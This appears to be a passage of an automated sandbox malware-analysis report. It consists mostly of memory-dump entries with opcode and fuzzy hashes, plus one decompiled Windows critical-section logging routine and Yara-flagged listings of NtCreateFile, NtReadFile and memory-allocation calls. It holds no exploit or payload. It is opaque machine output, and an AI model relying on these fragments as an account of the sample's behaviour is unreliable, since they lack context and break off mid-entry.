                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3796d7578e20a6bfbeb766d291d29b47665226c21b6033db492b1e7dae600050
                                                          • Instruction ID: 94700ec8fefde082b54678ac0a0cdfce54c28ed17b49b12d4de799599ab4ffd9
                                                          • Opcode Fuzzy Hash: 3796d7578e20a6bfbeb766d291d29b47665226c21b6033db492b1e7dae600050
                                                          • Instruction Fuzzy Hash: B39002F1601140924905A2D99604B0A4505A7E0341B51C01AE1045564CC6E58851A175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1897d71a4124c8abae2cc39ee43e9a71d48bef038f514e337304847fd37cec4
                                                          • Instruction ID: 4d4f44b83dce8110593bb719c6d7fbf477d114882ebf4aa67d4574710790a24d
                                                          • Opcode Fuzzy Hash: f1897d71a4124c8abae2cc39ee43e9a71d48bef038f514e337304847fd37cec4
                                                          • Instruction Fuzzy Hash: F4900271E0500012954571D95A146464006B7E0781B55C015A0505558CCAD48A5563E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4b482d045672740b4bf5d2bc86889bba22aba85c496c08e95f0c4cd329bd729
                                                          • Instruction ID: 3379f4464a11a865ffbb0d8609c90a4b687cc87a3e0278c39f0eb31e4a482404
                                                          • Opcode Fuzzy Hash: d4b482d045672740b4bf5d2bc86889bba22aba85c496c08e95f0c4cd329bd729
                                                          • Instruction Fuzzy Hash: 0D9002B160140403D54565D95A046070005A7D0342F51C015A2055559ECBE98C517175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5200fae8218c1046ba91f889de05b97527f791e8edf07d6eb11c2d2e813978f
                                                          • Instruction ID: 04e2fd7a2bc647c1d9beb71fd50a00c134ab0850cd1bf01dcab6eae0eaa36fe5
                                                          • Opcode Fuzzy Hash: c5200fae8218c1046ba91f889de05b97527f791e8edf07d6eb11c2d2e813978f
                                                          • Instruction Fuzzy Hash: 0290027562100002054AA5D9170450B0445B7D6391391C019F1407594CC7E188656361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8492b884239d5ca5046c459efce0d49b7d018a16712cafcbbbd2b164c1d9dd7a
                                                          • Instruction ID: 5bc44fa2603522cb00724e327df4c18e4ff01ee4ca7271bcb6291baf465da229
                                                          • Opcode Fuzzy Hash: 8492b884239d5ca5046c459efce0d49b7d018a16712cafcbbbd2b164c1d9dd7a
                                                          • Instruction Fuzzy Hash: 769002B161100042D50961D956047060045A7E1341F51C016A2145558CC6E98C616165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c22bb3cd4f8e18c3c53ac0d62db9d65268749a216b37b84c69a78e82e4f07c1
                                                          • Instruction ID: e897d282e921a99ad5dccaf70b079e1fe6653431d43513ee04a0c42ef28ffde0
                                                          • Opcode Fuzzy Hash: 0c22bb3cd4f8e18c3c53ac0d62db9d65268749a216b37b84c69a78e82e4f07c1
                                                          • Instruction Fuzzy Hash: FB90027160100802D50961D95A046860005A7D0341F51C015A6015659ED7E588917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                          • Instruction ID: d84271b4042756854868afd849ded3c94c53c0624b7fbfd21c91c990c76eaa35
                                                          • Opcode Fuzzy Hash: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                          • Instruction Fuzzy Hash: 6A90027164100402D54671D956046060009B7D0381F91C016A0415558EC7D58A56BAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                          • Instruction ID: 2d02b62a983d6cffe4aa1e31a59cca03ef7949e5f59deb8f96daa1a1d4b3a03d
                                                          • Opcode Fuzzy Hash: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                          • Instruction Fuzzy Hash: 5A9002B1A01140434945B1D95A044065015B7E1341391C125A0445564CC7E88855A2A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                          • Instruction ID: 63f2cb14097e1d122272a423a8f0d6278272abe9db10a52d16f64e238b2036f0
                                                          • Opcode Fuzzy Hash: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                          • Instruction Fuzzy Hash: A490027170100402D50761D956146060009E7D1385F91C016E1415559DC7E58953B172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                          • Instruction ID: 7aba5fa7b604d37544dd5157538e849125b873452414abcc80bfb39587b8b49d
                                                          • Opcode Fuzzy Hash: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                          • Instruction Fuzzy Hash: 7B90027164100802D54571D996147070006E7D0741F51C015A0015558DC7D6896576F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                          • Instruction ID: 9ae70f672fa2f574a72f9687f92528d8fec9a34088b2d4c7fd1419df4d653306
                                                          • Opcode Fuzzy Hash: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                          • Instruction Fuzzy Hash: 06900271701000529905A6D96A04A4A4105A7F0341B51D019A4005558CC6D488616161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                          • Instruction ID: 317169a68c334021f5a036e84f10f5c8159a2d3e757a2e7d5d2ba7f24198897f
                                                          • Opcode Fuzzy Hash: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                          • Instruction Fuzzy Hash: C8900271A0500402D54571D966187060015A7D0341F51D015A0015558DC7D98A5576E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                          • Instruction ID: d5cd2fbdd9b276131ba149b87772651e7e0ebe8ce4abe4b0d77f2db181fb0d0b
                                                          • Opcode Fuzzy Hash: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                          • Instruction Fuzzy Hash: D390047170100403D50571DD770C7070005F7D0341F51D415F041555CDD7D7CC517171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                          • Instruction ID: b82f8d17fcce39cd656a51175c438180277d136f400d1695c4bdf1690c94c960
                                                          • Opcode Fuzzy Hash: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                          • Instruction Fuzzy Hash: 2090027160504442D50565D96608A060005A7D0345F51D015A1055599DC7F58851B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                          • Instruction ID: 914bdef2c311007e32b9389ee2b981f77d5ce224028db100dcd47541e89c04be
                                                          • Opcode Fuzzy Hash: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                          • Instruction Fuzzy Hash: 7990027560504442D90565D96A04A870005A7D0345F51D415A041559CDC7D48861B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                          • Instruction ID: 24946a14830f6f4ae980ed136cc74b1d73ed8e852415d2cd0fe7c4f79e9c28af
                                                          • Opcode Fuzzy Hash: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                          • Instruction Fuzzy Hash: DE90027160144002D54571D9964460B5005B7E0341F51C415E0416558CC7D58856A261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                          • Instruction ID: 156885876f292487b950adc1625278ad5e1ac55ae6d397bc4f0dac320c0ea249
                                                          • Opcode Fuzzy Hash: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                          • Instruction Fuzzy Hash: F8900271A0500802D55571D956147460005A7D0341F51C015A0015658DC7D58A5576E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                          • Instruction ID: 3d4d0aa81376ecb7814e1490ed1456fe7b9497aa0139d5f5ca5d9bac80580023
                                                          • Opcode Fuzzy Hash: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                          • Instruction Fuzzy Hash: 5090027160140402D50561D95A087470005A7D0342F51C015A5155559EC7E5C8917571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                          • Instruction ID: 4d8e31a7e43ccca69c778ed29bd280171c0b637b6961dcdb197d99ce47f59523
                                                          • Opcode Fuzzy Hash: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                          • Instruction Fuzzy Hash: CD90027160504842D54571D95604A460015A7D0345F51C015A0055698DD7E58D55B6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                          • Instruction ID: efa4f12146823e4a84f15b08ac7e649b9ae7b961f2e2d9e8f162b02f51f91c45
                                                          • Opcode Fuzzy Hash: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                          • Instruction Fuzzy Hash: A090027160144442D54562D95A04B0F4105A7E1342F91C01DA4147558CCAD588556761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                          • Instruction ID: 7b438a89f0d56d91ecccd4ec9e28c9abf4c1b66b100fae670ef48f29d20685a6
                                                          • Opcode Fuzzy Hash: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                          • Instruction Fuzzy Hash: 4190027160100842D50561D95604B460005A7E0341F51C01AA0115658DC7D5C8517561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 93f274c54b82353db9cf7ffc6b3f85f9f96d7f4fb82dbc89b857f5f220da980b
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0114FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E010FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E01145720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E01145720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}










                                                          0x0114fdda
                                                          0x0114fde2
                                                          0x0114fde5
                                                          0x0114fdec
                                                          0x0114fdfa
                                                          0x0114fdff
                                                          0x0114fe0a
                                                          0x0114fe0f
                                                          0x0114fe17
                                                          0x0114fe1e
                                                          0x0114fe19
                                                          0x0114fe19
                                                          0x0114fe19
                                                          0x0114fe20
                                                          0x0114fe21
                                                          0x0114fe22
                                                          0x0114fe25
                                                          0x0114fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0114FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0114FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0114FE2B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                          • Instruction ID: fbb28d2d54a775c3538ff13e23c531249c72b50af1b8ebceb5f8e62fc96baed8
                                                          • Opcode Fuzzy Hash: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                          • Instruction Fuzzy Hash: C1F0F632240602BFE6281B89DC02F63BF5AEB44B71F150328F6685A5D1DA62F82086F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,008E3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008E3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 008E863D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 4497b612a1504b1dd47225bd9e076f299f6990e532c019caacb664b6d470ef73
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 54F0BDB2204208ABCB08CF89DC85EEB77ADBF8C754F158248FA0D97241C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(008E3D82,5E972F65,FFFFFFFF,008E3A41,?,?,008E3D82,?,008E3A41,FFFFFFFF,5E972F65,008E3D82,?,00000000), ref: 008E86E5
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: bfbb9772b5f4a4ab34017efb9f31a7215ec2aec487b3d88963b4cd231d4d33cb
                                                          • Instruction ID: 5f8e3d7acb8a8937dec9defc11fe5cdefd11a65814add54efcf24603bbbca91d
                                                          • Opcode Fuzzy Hash: bfbb9772b5f4a4ab34017efb9f31a7215ec2aec487b3d88963b4cd231d4d33cb
                                                          • Instruction Fuzzy Hash: 8F01F2B2200119ABCB14DF99CC85EEB77A9FF8C350F118658FA1D97251DA30E905CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(008E3D82,5E972F65,FFFFFFFF,008E3A41,?,?,008E3D82,?,008E3A41,FFFFFFFF,5E972F65,008E3D82,?,00000000), ref: 008E86E5
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 4da4b21a869b613e6b4ba20e1e1b575eba70f5e17edd6df777e0a00dcd77bcb8
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: 8CF092B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008D2D11,00002000,00003000,00000004), ref: 008E8809
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: c7498a8d3f84a9b2589ffc9f409454aa225a2ada68c89689d0797d89f15045b3
                                                          • Instruction ID: 27efd89aaf68cfc2eb179146eea10a11984a66953fe0a446e7d91e6f32562c44
                                                          • Opcode Fuzzy Hash: c7498a8d3f84a9b2589ffc9f409454aa225a2ada68c89689d0797d89f15045b3
                                                          • Instruction Fuzzy Hash: 1EF05EB1600108AFCB18CF99CC81EEB77A9FF88340F108258FE0897241C630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008D2D11,00002000,00003000,00000004), ref: 008E8809
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: bd673902f03a801236f8745dc960239f07d00611b8db7a83b946a53aefe6ac21
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: A1F015B2200208ABCB14DF89CC81EAB77ADFF88750F118148FE0897241C630F810CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(008E3D60,?,?,008E3D60,00000000,FFFFFFFF), ref: 008E8745
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 4935b86e581d7fe7700e117e309a4c9a9034e792f81eb656ffa07d8cf685bb26
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: BBD01776200218ABD710EB99CC89EA77BACEF48760F154499BA589B242C570FA0086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fac8271150c5dde454bca83599766c2f7cac79f53cd2033d23f91ed9f89d5f9b
                                                          • Instruction ID: 1e657a2abe384a515342cff0d4ae71bbbc790e4488357af2ac7e9dd5e6847649
                                                          • Opcode Fuzzy Hash: fac8271150c5dde454bca83599766c2f7cac79f53cd2033d23f91ed9f89d5f9b
                                                          • Instruction Fuzzy Hash: 9D9002E120200103614571594814656410B97E0245B62C021E2025590DD569D8917165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ca2dbff1b8b5f94840ee481408a0b08cc2e9b0d621b663bd5f816e3196a533ed
                                                          • Instruction ID: 3e2a15ef538235e98227303a29f402a58ea52eb2d6ba17b748a6b47f39d7b60e
                                                          • Opcode Fuzzy Hash: ca2dbff1b8b5f94840ee481408a0b08cc2e9b0d621b663bd5f816e3196a533ed
                                                          • Instruction Fuzzy Hash: 8C9002A5211001032145A5590B04547014797D5395362C021F2026550CE665D8617161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 30b5b344b2509b608891b7bfef1104f583b81de636b1c130d87ad226c3b8a3f1
                                                          • Instruction ID: f1b787158599e62a1d46a3081be1e0aa44dbdeb9b69cb854f3d5d3905de81bab
                                                          • Opcode Fuzzy Hash: 30b5b344b2509b608891b7bfef1104f583b81de636b1c130d87ad226c3b8a3f1
                                                          • Instruction Fuzzy Hash: AD9002B120100942F14061594804B86010697E0345F62C016A1135654D9659D8517561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2c364df81306bbecf0db3f4bcd1ccdc4eb84081488aee4176e5ed71a057c766e
                                                          • Instruction ID: 315e872a1ebc573300b0e8e3fbf47b16479c13b76286fce19664098b248ffdc9
                                                          • Opcode Fuzzy Hash: 2c364df81306bbecf0db3f4bcd1ccdc4eb84081488aee4176e5ed71a057c766e
                                                          • Instruction Fuzzy Hash: 0C9002B120108902F1506159880478A010697D0345F66C411A5435658D96D9D8917161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 36eb41618b7d1ba52285d452f9fc7d44bf86e5818631b2b11257bc5b34b9f8e4
